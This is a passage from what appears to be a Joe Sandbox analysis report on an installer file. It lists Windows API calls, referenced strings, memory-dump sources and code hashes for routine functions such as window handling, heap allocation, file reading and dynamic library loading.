                                                                                                                        • SendMessageW.USER32(?,00001026,00000000,000000FF), ref: 0093F1F0
                                                                                                                        • SendMessageW.USER32(?,0000108A,00000000,00000011), ref: 0093F203
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageRectSendWindow$Parent$Delete
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3294981445-0
                                                                                                                        • Opcode ID: b59875d7eddb577bb8e4261e1d26bc18fa73ada8190c19fa0f7f7c9649a1a207
                                                                                                                        • Instruction ID: 6cb265b0d5bd92ced01a5020f167020f9a5885cb6659d70dea6b5102e9815eac
                                                                                                                        • Opcode Fuzzy Hash: b59875d7eddb577bb8e4261e1d26bc18fa73ada8190c19fa0f7f7c9649a1a207
                                                                                                                        • Instruction Fuzzy Hash: 2F513B71D00649ABDB21DFA8CD45BEEBBF8EF59710F10432AE815A7291EB706981CB50
                                                                                                                        APIs
                                                                                                                        • GetWindowRect.USER32(?,?), ref: 008608EA
                                                                                                                        • GetWindow.USER32(?,00000005), ref: 008608F7
                                                                                                                        • GetWindow.USER32(00000000,00000002), ref: 00860A32
                                                                                                                          • Part of subcall function 00860740: GetWindowRect.USER32(?,?), ref: 0086076C
                                                                                                                          • Part of subcall function 00860740: GetWindowRect.USER32(?,?), ref: 0086077C
                                                                                                                        • GetWindowRect.USER32(?,?), ref: 0086098B
                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 0086099B
                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 008609B5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Rect
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3200805268-0
                                                                                                                        • Opcode ID: fe17241d51a167f3a572a68278d17129317909f45c1300c724fda4f964eb7a3d
                                                                                                                        • Instruction ID: 59d4c96a6ef723f9a5de68ef33fd14ec15273b47cd864dc7109eed01b6263fa6
                                                                                                                        • Opcode Fuzzy Hash: fe17241d51a167f3a572a68278d17129317909f45c1300c724fda4f964eb7a3d
                                                                                                                        • Instruction Fuzzy Hash: 8741A8315087019BC721DB29C980E6BFBEAFF96704F554A2DF085C3521EB30E988CB52
                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,0000000D,00000000,?,00A1598B,?,?,?,?,?,?,?), ref: 00A15805
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,00A1598B,?,?,?,?,?,?,?), ref: 00A1580C
                                                                                                                          • Part of subcall function 00A158D7: IsProcessorFeaturePresent.KERNEL32(0000000C,00A157F3,00000000,?,00A1598B,?,?,?,?,?,?,?), ref: 00A158D9
                                                                                                                        • InterlockedPopEntrySList.KERNEL32(00000000,00000000,?,00A1598B,?,?,?,?,?,?,?), ref: 00A1581C
                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00A1598B,?,?,?,?,?,?,?), ref: 00A15843
                                                                                                                        • RaiseException.KERNEL32(C0000017,00000000,00000000,00000000,?,00A1598B,?,?,?,?,?,?,?), ref: 00A15857
                                                                                                                        • InterlockedPopEntrySList.KERNEL32(00000000,?,00A1598B,?,?,?,?,?,?,?), ref: 00A1586A
                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00A1598B,?,?,?,?,?,?,?), ref: 00A1587D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocEntryHeapInterlockedListVirtual$ExceptionFeatureFreePresentProcessProcessorRaise
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2460949444-0
                                                                                                                        • Opcode ID: a1b7fef9519f2df2a711ebb60fc03022808597c182037995dbeeb5f246281cf3
                                                                                                                        • Instruction ID: 8589b61c7127e17281f4e9e559686aa49a2610b6dcbaecdbc745c128214e8d4e
                                                                                                                        • Opcode Fuzzy Hash: a1b7fef9519f2df2a711ebb60fc03022808597c182037995dbeeb5f246281cf3
                                                                                                                        • Instruction Fuzzy Hash: 52119075F01A12EFD7219BB8DD48FE6766DEB84781F240431F902E6251DE60DC42A7A0
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0084ABE0: GetProcessHeap.KERNEL32 ref: 0084AC35
                                                                                                                          • Part of subcall function 0084ABE0: __Init_thread_footer.LIBCMT ref: 0084AC67
                                                                                                                          • Part of subcall function 0084ABE0: __Init_thread_footer.LIBCMT ref: 0084ACF2
                                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,C7BA013E), ref: 009641B9
                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00001000,?,00000000,00001000), ref: 0096422B
                                                                                                                        • ReadFile.KERNEL32(?,00000000,00001000,00000000,00000000,?,?,00000000), ref: 009644CC
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 0096452A
                                                                                                                          • Part of subcall function 00964070: LoadStringW.USER32(000000A1,?,00000514,C7BA013E), ref: 00963FD6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$Init_thread_footerRead$CloseCreateHandleHeapLoadProcessString
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1714711150-0
                                                                                                                        • Opcode ID: 46a2cace4567d44e8fb53c0c0036cdeb24037f835d80b69de3dcea9becb74093
                                                                                                                        • Instruction ID: 9a15b35ac4aec85adc25f2301678716c42d0c24e87207609d7e94dec356eef67
                                                                                                                        • Opcode Fuzzy Hash: 46a2cace4567d44e8fb53c0c0036cdeb24037f835d80b69de3dcea9becb74093
                                                                                                                        • Instruction Fuzzy Hash: EEF19F71E00308DBDF10DFA8C949BAEBBB9FF45714F24821DE415AB291DB74AA44CB91
                                                                                                                        APIs
                                                                                                                        • __Init_thread_footer.LIBCMT ref: 00911A65
                                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,00B36A24,00000000), ref: 00911A9C
                                                                                                                        • __Init_thread_footer.LIBCMT ref: 00911B31
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Init_thread_footer$InfoParametersSystem
                                                                                                                        • String ID: AI_FRAME_NO_CAPTION_$Dialog$`Dialog` = '
                                                                                                                        • API String ID: 3910108132-2270296660
                                                                                                                        • Opcode ID: ab9075fa6a8306dca4b48a4bba5a4f95e281e7fb039604146226e4eefc11c158
                                                                                                                        • Instruction ID: 6af0b7656493e34e167b9c4ed0d862205098d643e1d5d35be711543e66a2e580
                                                                                                                        • Opcode Fuzzy Hash: ab9075fa6a8306dca4b48a4bba5a4f95e281e7fb039604146226e4eefc11c158
                                                                                                                        • Instruction Fuzzy Hash: 67D1AC71A10608EFCB14CF78DD85B9EBBB5FF58310F24C22AE915A7291DB70A944CB91
                                                                                                                        APIs
                                                                                                                        • CreateEventW.KERNEL32(00000000,00000000,00000000,Caphyon.AI.ExtUI.IEClickSoundRemover,C7BA013E), ref: 0085DC21
                                                                                                                        • GetLastError.KERNEL32 ref: 0085DC4A
                                                                                                                        • RegCloseKey.ADVAPI32(?,00AAA29C,00000000,00AAA29C,00000000,?,80000001,00000001,00000000,AppEvents\Schemes\Apps\Explorer\Navigating\.Current,00000033), ref: 0085DEBE
                                                                                                                        • CloseHandle.KERNEL32(?,C7BA013E,?,?,00000000,00A4297D,000000FF,?,00AAA29C,00000000,00AAA29C,00000000,?,80000001,00000001,00000000), ref: 0085DF4E
                                                                                                                        Strings
                                                                                                                        • Caphyon.AI.ExtUI.IEClickSoundRemover, xrefs: 0085DC16
                                                                                                                        • AppEvents\Schemes\Apps\Explorer\Navigating\.Current, xrefs: 0085DC82
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Close$CreateErrorEventHandleLast
                                                                                                                        • String ID: AppEvents\Schemes\Apps\Explorer\Navigating\.Current$Caphyon.AI.ExtUI.IEClickSoundRemover
                                                                                                                        • API String ID: 1253123496-2079760225
                                                                                                                        • Opcode ID: b8680bf1782f81469a8de5261fe22172b7ed8bcaf10c6c2839914bc550580391
                                                                                                                        • Instruction ID: 36dd54a0eaa11fe03a37011b279d9b3f4c916c985d9c548e66d0c6f25a07cc2b
                                                                                                                        • Opcode Fuzzy Hash: b8680bf1782f81469a8de5261fe22172b7ed8bcaf10c6c2839914bc550580391
                                                                                                                        • Instruction Fuzzy Hash: FAC1AD70D00348DFDB24CF68C949BAEBBB5FF55301F14829DE859A7281DB746A88CB51
                                                                                                                        APIs
                                                                                                                        • EnterCriticalSection.KERNEL32(00B314EC,C7BA013E,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00A42275), ref: 0085BD6A
                                                                                                                        • GetModuleFileNameW.KERNEL32(0000FFFF,00000104,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00A42275), ref: 0085BDEA
                                                                                                                        • EnterCriticalSection.KERNEL32(00B31508,?,?,?,?,?,?,?,?,?,?,?,00000000,00A42275,000000FF), ref: 0085BFA3
                                                                                                                        • LeaveCriticalSection.KERNEL32(00B31508,?,?,?,?,?,?,?,?,?,?,00000000,00A42275,000000FF), ref: 0085BFC4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$Enter$FileLeaveModuleName
                                                                                                                        • String ID: v
                                                                                                                        • API String ID: 1807155316-3261393531
                                                                                                                        • Opcode ID: a2c87af7267a4a98dee2888d6ea4155cc2f41d85038a94aa145d1cad7df360a6
                                                                                                                        • Instruction ID: 31ac6b062201dc698455b47bdafe665d283a3e388db842ac15df0fdf9ed9615c
                                                                                                                        • Opcode Fuzzy Hash: a2c87af7267a4a98dee2888d6ea4155cc2f41d85038a94aa145d1cad7df360a6
                                                                                                                        • Instruction Fuzzy Hash: 0EB15E70A00249DFDB11CFA4D848BAEBBB4FF18315F244559E804EB291DB75AD49CFA0
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(Advapi32.dll,00000000,C7BA013E), ref: 0095E414
                                                                                                                        • GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 0095E424
                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0095E46D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressCloseHandleModuleProc
                                                                                                                        • String ID: Advapi32.dll$RegOpenKeyTransactedW
                                                                                                                        • API String ID: 4190037839-3913318428
                                                                                                                        • Opcode ID: f79f6e7c74437613eb29da2dd70eb82f15da75bcde78dc5df38e9424994242d0
                                                                                                                        • Instruction ID: 7b562843f110ccab68a6e4e360e73466476d871ae5156dbeb17d4a243cddeaf0
                                                                                                                        • Opcode Fuzzy Hash: f79f6e7c74437613eb29da2dd70eb82f15da75bcde78dc5df38e9424994242d0
                                                                                                                        • Instruction Fuzzy Hash: 92A16AB0D00308DFDB14DFA9C949B9EBBB9FF44300F148569E815EB291DB75AA48CB91
                                                                                                                        APIs
                                                                                                                        • CoCreateInstance.COMBASE(00AAC5A4,00000000,00000001,00AACC2C,?), ref: 00857C60
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateInstance
                                                                                                                        • String ID: :${
                                                                                                                        • API String ID: 542301482-3766677574
                                                                                                                        • Opcode ID: 7c1ae00fa62a3c83a8e76462f6a379da3b5a36fa46ebe87aa9e7f69ab9573f39
                                                                                                                        • Instruction ID: 755a4ff5cc08d2ee83882cf3fdce97403852f8e2595f609ff5bc660221622281
                                                                                                                        • Opcode Fuzzy Hash: 7c1ae00fa62a3c83a8e76462f6a379da3b5a36fa46ebe87aa9e7f69ab9573f39
                                                                                                                        • Instruction Fuzzy Hash: 2561AF74A042169FDF249F649844BBEB7F5FF09722F148469EC01EB280EB759C858760
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32 ref: 009621F7
                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00962213
                                                                                                                        • GetExitCodeProcess.KERNEL32(00000000,00A7F697), ref: 00962224
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00962232
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseCodeErrorExitHandleLastObjectProcessSingleWait
                                                                                                                        • String ID: <$open
                                                                                                                        • API String ID: 2321548817-1930408713
                                                                                                                        • Opcode ID: a141e5d35109aa47a11d132ee4f3f02c6e0cdfe03b9e5a97265921f5606241be
                                                                                                                        • Instruction ID: 54ae327700599c11a077a2a38c5381e87ec502157f515967ec5a69d3c64360c6
                                                                                                                        • Opcode Fuzzy Hash: a141e5d35109aa47a11d132ee4f3f02c6e0cdfe03b9e5a97265921f5606241be
                                                                                                                        • Instruction Fuzzy Hash: ED617C71E046499FDB10CFA8C85879EBBB8FF49324F148269E825AB3D1DB749D01CB90
                                                                                                                        APIs
                                                                                                                        • EnterCriticalSection.KERNEL32(00B3683C,C7BA013E,00000000,00B36858), ref: 008593D3
                                                                                                                        • LeaveCriticalSection.KERNEL32(00B3683C), ref: 00859438
                                                                                                                        • LoadCursorW.USER32(00840000,?), ref: 00859494
                                                                                                                        • LeaveCriticalSection.KERNEL32(00B3683C), ref: 0085952B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$Leave$CursorEnterLoad
                                                                                                                        • String ID: v$ATL:%p
                                                                                                                        • API String ID: 2080323225-109518622
                                                                                                                        • Opcode ID: 8c95e99d50a1eb6963bcecc4a17cf5f617d8136f2bdccb6aa017764d8510e86f
                                                                                                                        • Instruction ID: 887ed40e34ff0ed3e402c9d7584be7cc8ce7f0504d8e93acec24c9b4055f8246
                                                                                                                        • Opcode Fuzzy Hash: 8c95e99d50a1eb6963bcecc4a17cf5f617d8136f2bdccb6aa017764d8510e86f
                                                                                                                        • Instruction Fuzzy Hash: 4451DE71D00B45DBDB21CF68C9056AAB7F4FF18711F10462EEC96A3690EB70B985CB50
                                                                                                                        APIs
                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00A2FA9F,?,?,?,00000000,00000000,?,00A2FD09,00000021,FlsSetValue,00AA3E7C,00AA3E84,?), ref: 00A2FA53
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeLibrary
                                                                                                                        • String ID: api-ms-$ext-ms-
                                                                                                                        • API String ID: 3664257935-537541572
                                                                                                                        • Opcode ID: 2bed11af0b174c95690811486275c1b67d7aba3ed6897125aedf16d9ffd02711
                                                                                                                        • Instruction ID: 8079e81721f1855ef49e5e4096ec3ec0fa0f120b8a2e550001844cdef692c8b8
                                                                                                                        • Opcode Fuzzy Hash: 2bed11af0b174c95690811486275c1b67d7aba3ed6897125aedf16d9ffd02711
                                                                                                                        • Instruction Fuzzy Hash: 5A21D572A01124AFCB21DB69BC51A5B3778AB517A0F260171FE0AE72D1EB30ED01C6D0
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00A1317B,00A130DE,00A1337F), ref: 00A13117
                                                                                                                        • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00A1312D
                                                                                                                        • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00A13142
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$HandleModule
                                                                                                                        • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                                                        • API String ID: 667068680-1718035505
                                                                                                                        • Opcode ID: caeb88b55bf037a409aa96fcffda862d37b6f1771f158d578862517b90beb781
                                                                                                                        • Instruction ID: 6ea3057c06f9fdae3f28e0969921f6823717383a4a8f8371275616535ea2cd8f
                                                                                                                        • Opcode Fuzzy Hash: caeb88b55bf037a409aa96fcffda862d37b6f1771f158d578862517b90beb781
                                                                                                                        • Instruction Fuzzy Hash: 89F0C237B022227F4F314FA55C81AF723FC5B017A43290A3AD902D3210EA90CEC296D0
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 0087EA4A
• std::_Lockit::_Lockit.LIBCPMT ref: 0087EA6C
• std::_Lockit::~_Lockit.LIBCPMT ref: 0087EA94
• __Getctype.LIBCPMT ref: 0087EB75
• std::_Facet_Register.LIBCPMT ref: 0087EBD7
• std::_Lockit::~_Lockit.LIBCPMT ref: 0087EC01
Memory Dump Source
• Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
